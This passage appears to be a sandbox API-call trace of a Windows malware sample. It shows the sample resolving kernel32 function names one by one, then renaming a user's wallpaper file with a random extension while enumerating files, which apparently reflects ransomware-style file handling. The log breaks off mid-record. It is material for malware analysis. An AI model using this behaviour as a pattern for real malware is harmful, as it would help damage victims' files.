[0080.509] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.509] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.509] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.509] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.509] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.509] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.510] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.510] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.510] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.510] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.510] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.510] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.510] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.510] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.510] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.510] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.510] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.510] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.510] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.510] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.510] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.510] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.510] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.510] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.510] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.511] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.511] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.511] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.511] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.511] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.511] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.511] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.511] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.511] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.511] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.511] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.511] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.511] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.511] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.511] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.511] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.511] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.511] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.511] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.512] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.512] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.512] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.512] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.512] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.512] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.512] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.512] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.512] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.512] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.512] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.512] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.512] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.512] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.512] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.512] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.512] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.512] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.512] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.512] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.513] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.513] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.513] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.513] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.513] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.513] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.513] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.513] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.513] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.513] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.513] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.513] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.513] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.513] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.513] lstrlenA (lpString="DELETEATOM") returned 10 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.513] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.513] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.513] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.513] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.514] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.514] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.514] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.514] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.514] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.514] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.514] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.514] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.514] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.514] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.514] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.514] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.514] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.514] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.514] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.514] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.514] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.514] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.514] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.515] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.515] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.515] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.515] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.515] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.515] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.515] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.515] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.515] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.515] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.515] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.515] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.515] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.515] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.515] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.515] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.515] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.515] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.515] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.516] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.516] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.516] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.516] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg") returned 94 [0080.516] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.oUmSVd") returned 101 [0080.516] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.oUmSVd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.oumsvd"), dwFlags=0x0) returned 1 [0080.516] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.517] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.517] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.517] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd9d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x9cfab, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 0 [0080.517] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.517] CloseHandle (hObject=0x450) returned 1 [0080.518] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 